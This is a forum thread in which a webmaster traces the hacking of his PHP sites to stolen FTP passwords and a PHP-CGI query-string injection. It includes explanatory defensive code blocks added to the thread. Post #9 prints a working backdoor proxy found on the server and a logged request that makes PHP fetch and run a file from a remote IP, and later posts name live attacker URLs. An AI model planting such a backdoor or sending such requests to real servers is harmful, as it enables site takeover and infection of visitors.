#1
It seems like every one of my websites for which I have saved passwords within FileZilla (my FTP client) has been hacked.
Code has either been inserted into PHP files, and/or the htaccess files have been altered, so that clicking a link from Google to my pages redirects to someone else's website. My question is: do you think that there is a connection between having the passwords saved and the sites being hacked? Does this sound like my computer has a virus? I also just noticed that when I delete or copy/paste a file I need to manually refresh for it to show up or disappear.

As for my websites, I did the coding myself and have been lazy on some of my websites where information can be input; does it sound like somebody is just taking advantage of that? Aside from form inputs, I use JavaScript HTTP calls often on my websites, and it would not be hard to look at the script to see the website address along with the GET array being passed. Do you think that this would be a vulnerability as well? Other than those two things (form inputs and GET arrays), can anyone point out some other areas I may need to secure? I have quite a few websites to go through and secure. I want to make a checklist of all areas I need to secure. For instance, would my file permissions have anything to do with this? Thanks for any advice.
#2
To check for spyware on your computer, follow the instructions in the READ & RUN ME FIRST Malware Removal Guide.

A good help in securing your sites using GET requests is often to look at the log files for strange things like SQL or PHP code, to know what people have tried. If they have gained enough access, they can change the log files, though, so this isn't always accurate. The way to secure user input is to not use any user value (even select boxes or checkboxes, which can be edited by those who know how) until it's been filtered for SQL, PHP, JavaScript, VBScript, CSS, HTML, or any other languages the variable may come in contact with. (Filter on the server. Filtering in the client can be bypassed.) If it's a number, parsing it into a numeric variable is usually sufficient. Never insert a raw input directly into SQL, eval, or the like, because that will make injection attacks very easy. Searching for "protecting against php injection attacks" will give a lot of advice. It's good to look at more than a few pages, because they too often miss some small thing that an attacker won't.
__________________
I.think(code); I.eat(code.spaghetti); Last edited by PC-XT; 06-11-12 at 21:48..
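As an added illustration of the advice in the post above (example code, not from the thread or its posters): the same ?id= value handled first the vulnerable way, then filtered on the server, bound into the query and escaped on output. The SQLite table and the input value are constructed for the demo, and the pdo_sqlite extension is assumed so the script runs stand-alone.

```php
<?php
// Added example, not code from the thread: the same ?id= value handled the
// vulnerable way and the hardened way. Assumes the pdo_sqlite extension so the
// script runs stand-alone; the table and the input value are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO posts (title) VALUES ('Public page'), ('Unpublished <draft>')");

// Constructed input: what a tampered link or a hand-built request might carry.
$rawId = '1 OR 1=1';

// VULNERABLE: the raw GET value is pasted into the SQL text, so it rewrites the
// WHERE clause and the query returns every row instead of just id 1.
function vulnerableLookup(PDO $db, string $id): array
{
    return $db->query("SELECT title FROM posts WHERE id = $id")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: validate on the server, bind the value, escape for the output context.
function hardenedLookup(PDO $db, string $rawId): array
{
    // 1. Validate the type: an id is a positive integer; anything else is rejected
    //    outright rather than "cleaned up" and passed on.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];                      // a real page would answer 400 Bad Request
    }
    // 2. Parameterise: a bound value can never change the structure of the query.
    $stmt = $db->prepare('SELECT title FROM posts WHERE id = :id');
    $stmt->execute([':id' => $id]);
    // 3. Escape for where the data ends up (HTML body text here), at output time
    //    and for that context, not once "for everything" on the way in.
    return array_map(
        fn(string $t) => htmlspecialchars($t, ENT_QUOTES | ENT_HTML5, 'UTF-8'),
        $stmt->fetchAll(PDO::FETCH_COLUMN)
    );
}

// Run both on the same input and show the difference.
printf("vulnerable: %s\n", json_encode(vulnerableLookup($db, $rawId)));
printf("hardened:   %s\n", json_encode(hardenedLookup($db, $rawId)));
printf("hardened:   %s\n", json_encode(hardenedLookup($db, '2')));
```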
#3
Thank you for the information, I will go read around right now.
By the way, I do have a good idea how I can secure the inputs. I am mainly wondering if anyone knows of any common ways besides address-bar GET and form GET and POST input that I should be aware of?
#4
Hey guys, I have a quick question while I am going through the READ & RUN ME FIRST.
I was just checking my list of startup items and I noticed a weird one: 'Ruabomgu', which runs the command 'C:\Users\xyz\AppData\Roaming\Sygegy\ihig.exe'. I checked inside of the Roaming folder and noticed that a lot of my programs which require passwords, including my FTP program which I think someone stole my passwords from, are all listed in the Roaming folder. Is the Roaming folder a vulnerability? I would imagine that the READ & RUN ME FIRST might fix this; I am just trying to understand how they got my information.
#5
I can't find anything about Ruabomgu or Sygegy, so I assume it's not a common startup item, and the names sound suspicious. If, for some reason, the READ & RUN ME FIRST guide doesn't take care of it, ask in the malware section, attaching the logs. Approved volunteer malware experts give one-on-one help there, as they have time. It's the best free help for this stuff that I've found.

Alternative inputs: You can input via HTTP headers using AJAX, but they are less compatible with some implementations, and they aren't usually used to transfer large blocks of information. I've also heard of using custom methods in forms, but it's still basically the same as GET or POST. The way input is received doesn't really matter in server security, since someone who knows how can still change the inputs at will. Changing the method will just delay this. The server should filter all the inputs as if they could contain malicious code before using them, regardless of how they arrived.
__________________
I.think(code); I.eat(code.spaghetti);
#6
When you say that the server should filter it, do you mean server-side code (PHP) instead of front-end (JavaScript)?
I am asking because my hosting company is telling me that the security has nothing to do with their servers and everything to do with the code being vulnerable.
#7
Yes. When I said server, I meant the code that takes the relevant input, processes it, and replies to the client. It's good to validate stuff with JavaScript, too, but the server (whatever code uses the validated stuff) can't rely on it actually being validated. I don't know if that is an issue with your code, but I see too many vulnerabilities in general from this, so I mentioned it. It's more of a problem with AJAX, because JavaScript must be turned on for it to work, so it's easier to rely on it too much, forgetting that it can be circumvented.
Sorry for the confusion. I hope it's not too hard to get rid of the spyware, if that's what it is, and any code vulnerabilities.
__________________
I.think(code); I.eat(code.spaghetti);
#8
PC-XT, thank you very much for the help. I did have a trojan virus on my computer, but it was easy to get rid of.
My websites had about 30 htaccess files and code inserts throughout. As for using JavaScript, do you just mean like urlencode? Or what else would you do?
#9
Quick update: I was searching through my log files today after restoring my pages and adding some security features. One of the lines caught my eye:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346

That specific index file does not use the GET array. It looks suspect to me, but I am not exactly sure what it is doing. The info3.txt looked like the end of a file, so I went searching through my directories for it; I did not find it. But I did find what appears to be a trojan gateway type of PHP file which I did not create. It was called "ok.php". I am trying to understand how someone can add a PHP file to my website; would they need my password, or is some type of cross browser scripting possible to create a new PHP file like this:

<?php
// URL of the original server.
$url = "http://77.91.204.236/celka/update.php";
@error_reporting(0);
@set_time_limit(0);
// Connect to the original server.
$url = @parse_url($url);
if (!isset($url['port'])) $url['port'] = 80;
if (($real_server = @fsockopen($url['host'], $url['port'])) === false) die('E1');
// Get the data to forward.
if (($data = @file_get_contents('php://input')) === false) $data = '';
// Build the request.
$request = "POST {$url['path']}?ip=" . urlencode($_SERVER['REMOTE_ADDR']) . " HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";
if (!empty($_SERVER['HTTP_USER_AGENT'])) $request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: " . strlen($data) . "\r\n";
$request .= "Connection: Close\r\n";
// Send it.
fwrite($real_server, $request . "\r\n" . $data);
// Read the response.
$result = '';
while (!feof($real_server)) $result .= fread($real_server, 1024);
fclose($real_server);
// Output the response.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>

EDIT: I did a search on that last bit: http%3A%2F%2F81.17.24.83%2Finfo3.txt, which when I looked at it closer is clearly: http://81.17.24.83/info3.txt. They are talking about cross browser scripting attempts using the same line that I am seeing in my log file. Anyone familiar with how they get that back door file onto your site in the first place? Is that the same as XSS? Last edited by gamecoding27; 06-14-12 at 01:34..
#10
Bingo: http://81.17.24.83/info2.txt. I just started changing the number on info#.txt and came across that file.
It is the code that has been getting inserted into my files.
#11
Guys, do not open the website link that I posted: http://81.17.24.83/info2.txt
I believe it gave me a trojan when I went to it, plus they got my IP and started attacking my computer... I just ran superantivirus and re-installed Mozilla. It seems that Mozilla and Chrome are both hijacked. When I try to come to this website, "majorgeeks.com", I am sent to the Hotmail login. Internet Explorer is the only browser I can get to come here.
#12
Sometimes leaving your modem off for a while will change your IP. http://forums.majorgeeks.com/showthread.php?t=223570

The Malware Removal section helps with hijacked or redirecting browsers, too.

The -d switches in the URL were attempts to override options in the php.ini file, like using ini_set(). I don't know if they were successful or not. You could try overriding a php.ini option in this way for a test PHP file that just displays their values to see if it's a vulnerability: .../test.php?-doption=value

I found the same attack on another site. Since the given file apparently doesn't exist, it's probably just used to mark the IP as vulnerable to attack.

It is possible to use PHP injection to add a file, if they can get PHP code to execute.

By JavaScript validation, I mean checking that things sent to the server are in the right range and format that is expected by the server, so that it doesn't need to send as many error messages. It saves time and bandwidth, but technically doesn't improve security. The server code should still do the same checks, either way.
__________________
I.think(code); I.eat(code.spaghetti);
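An added example, not code from the thread: a small PHP scanner for the log pattern gamecoding27 posted, run over constructed access-log lines (placeholder host instead of the real one). It applies the rule behind the -d switches PC-XT explains, namely that a query string with no literal '=' reaches a CGI script as command-line arguments, and pulls out the auto_prepend_file URL as the indicator worth keeping.

```php
<?php
// Added example, not code from the thread: scan web-server access-log lines for
// the "-d option=value" query strings shown in post #9. The three log lines are
// constructed; the first mirrors the thread's request with a placeholder host.

$logLines = [
    '203.0.113.5 - - [14/Jun/2012:01:10:22 +0000] "GET /index.php?-dsafe_mode%3dOff+'
        . '-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fexample.invalid%2Finfo3.txt'
        . ' HTTP/1.1" 200 8346',
    '203.0.113.9 - - [14/Jun/2012:01:11:02 +0000] "GET /index.php?page=about&id=7 HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/Jun/2012:01:11:40 +0000] "GET /index.php?%2Ds HTTP/1.1" 200 9000',
];

// Returns null for an ordinary request, or the injected switches for a suspicious one.
function detectCgiArgInjection(string $line): ?array
{
    // Pull the request target out of the "METHOD /target HTTP/x.y" field.
    if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"#', $line, $m)) {
        return null;
    }
    $rawQuery = parse_url($m[1], PHP_URL_QUERY) ?: '';
    // CGI rule: a query string with no literal '=' is passed to the script as
    // command-line arguments, which php-cgi then parsed as its own switches.
    // That is why the attacker encodes every '=' as %3d.
    if (strpos($rawQuery, '=') !== false) {
        return null;
    }
    // urldecode() turns '+' into spaces and %2D into '-', exposing the switches.
    $args = explode(' ', urldecode($rawQuery));
    $switches = array_values(array_filter($args, fn($a) => $a !== '' && $a[0] === '-'));
    if ($switches === []) {
        return null;
    }
    $finding = ['switches' => $switches, 'prepend_url' => null];
    foreach ($switches as $s) {
        // auto_prepend_file set to a URL is the payload delivery: with
        // allow_url_include on, PHP would fetch and run it before index.php.
        if (strpos($s, '-dauto_prepend_file=') === 0) {
            $finding['prepend_url'] = substr($s, strlen('-dauto_prepend_file='));
        }
    }
    return $finding;
}

foreach ($logLines as $n => $line) {
    $hit = detectCgiArgInjection($line);
    printf("line %d: %s\n", $n + 1, $hit === null ? 'ok' : json_encode($hit));
}
```

The second sample line carries a literal '=' and is reported as ok; the first and third are flagged, the first with its prepend URL, which is what you would block at the outbound side and search the other sites' logs for.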
#13
PC-XT, thanks for responding again.
I talked to my internet company and they told me it resets every 24 hours, but they reset it for me right then. The malware removal section cleared the hijacked browsers right up (specifically ComboFix). In my php.ini file all of the variables they are trying to manipulate are set at the values they are trying to set, besides the "-dauto_prepend_file" which is NULL. Do you know what safe mode is? Is it normally on?
#14
PC-XT, thanks for responding again.
The malware removal got rid of the browser problem with no problems, specifically ComboFix. I contacted my internet company and they told me that my IP changes every 24 hours, but they changed it right then to be safe. It looks like all of the values are set like they want in the php.ini with the -d switches they are running, except for the last one with the URL: -dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346. Those don't seem like safe settings, but I am not familiar with what those values were before they were messing with them. I will do like you said and test that command myself.
#15
And when you say to test the values, would you just do phpinfo() or what do you mean? Thanks for all of the other detail too.
#16
I'm glad to hear problems are getting fixed.

Safe mode is off by default, unless the host requires it to be on. I believe it has been removed from the latest version of PHP. It was sort of a hack to correct for systems that didn't provide adequate security.
http://www.php.net/manual/en/features.safe-mode.php
http://www.php.net/manual/en/feature....functions.php
http://www.php.net/manual/en/ini.sect.safe-mode.php
http://docs.joomla.org/Why_shouldn%2...P_safe_mode%3F

As for the test PHP file, it could be just <?php echo(ini_get('safe_mode')); ?> with whatever settings you are trying to override via the -d switch. If it does override settings, I think it's just for that particular time the script and any included files are called, ignoring the ini file, but I'm not sure. The command line options are listed here, but they may work differently in a URL, if they even work at all: http://www.php.net/manual/en/feature...ne.options.php

This might be another test file: <?php phpinfo(4); ?> I'm not sure which is best.
__________________
I.think(code); I.eat(code.spaghetti); Last edited by PC-XT; 06-15-12 at 21:47.. Reason: added phpinfo ini section example
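Along the lines of the test file PC-XT describes, an added example (not code from the thread or its posters): it reads the directives named in the logged request with ini_get() and flags values a hardened host should not show, printing as plain text so the page itself renders nothing as HTML. The directive list and the pass/fail rules are my own choices, not anything the thread states.

```php
<?php
// Added example, not code from the thread: a throw-away test page that reports
// the php.ini directives the logged -d switches tried to change and flags unsafe
// values. Remove it when done, since it discloses configuration.

header('Content-Type: text/plain');    // plain text, so nothing here renders as HTML

// Each directive maps to a predicate that is true when the current value is acceptable.
$checks = [
    'allow_url_fopen'   => fn($v) => !filter_var($v, FILTER_VALIDATE_BOOLEAN),
    'allow_url_include' => fn($v) => !filter_var($v, FILTER_VALIDATE_BOOLEAN),
    'auto_prepend_file' => fn($v) => $v === '',   // a URL here is what the attacker wanted
    'disable_functions' => fn($v) => $v !== '',   // expect at least some functions disabled
    'safe_mode'         => fn($v) => true,        // report only; removed in PHP 5.4
];

// Returns [directive => ['value' => string, 'ok' => bool]] for every directive in $checks.
function auditIni(array $checks): array
{
    $report = [];
    foreach ($checks as $name => $isSafe) {
        $value = ini_get($name);           // false when this PHP build has no such directive
        if ($value === false) {
            $report[$name] = ['value' => '(no such directive)', 'ok' => true];
            continue;
        }
        $report[$name] = ['value' => $value === '' ? '(empty)' : $value, 'ok' => $isSafe($value)];
    }
    return $report;
}

// The query-string switch problem concerns php-cgi, so the SAPI name matters too.
printf("SAPI: %s   loaded php.ini: %s\n\n", php_sapi_name(), php_ini_loaded_file() ?: '(none)');
foreach (auditIni($checks) as $name => $r) {
    printf("%-18s %-6s %s\n", $name, $r['ok'] ? 'ok' : 'UNSAFE', $r['value']);
}
```

Request it once plainly and once with a -d switch in the query string, as in .../test.php?-dallow_url_include%3dOn; if the reported value differs between the two requests, the switches are being honoured.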
#17
PC-XT, thanks again for all of your help, buddy. Someone passed me along this link: https://bugs.php.net/bug.php?id=61910
It turns out that it was fixed in a recent PHP patch. For anyone on an older version of PHP (or non-Apache, I think) there is an htaccess bit in the comments that prevents the -d, -s and other switches from being used in the URL.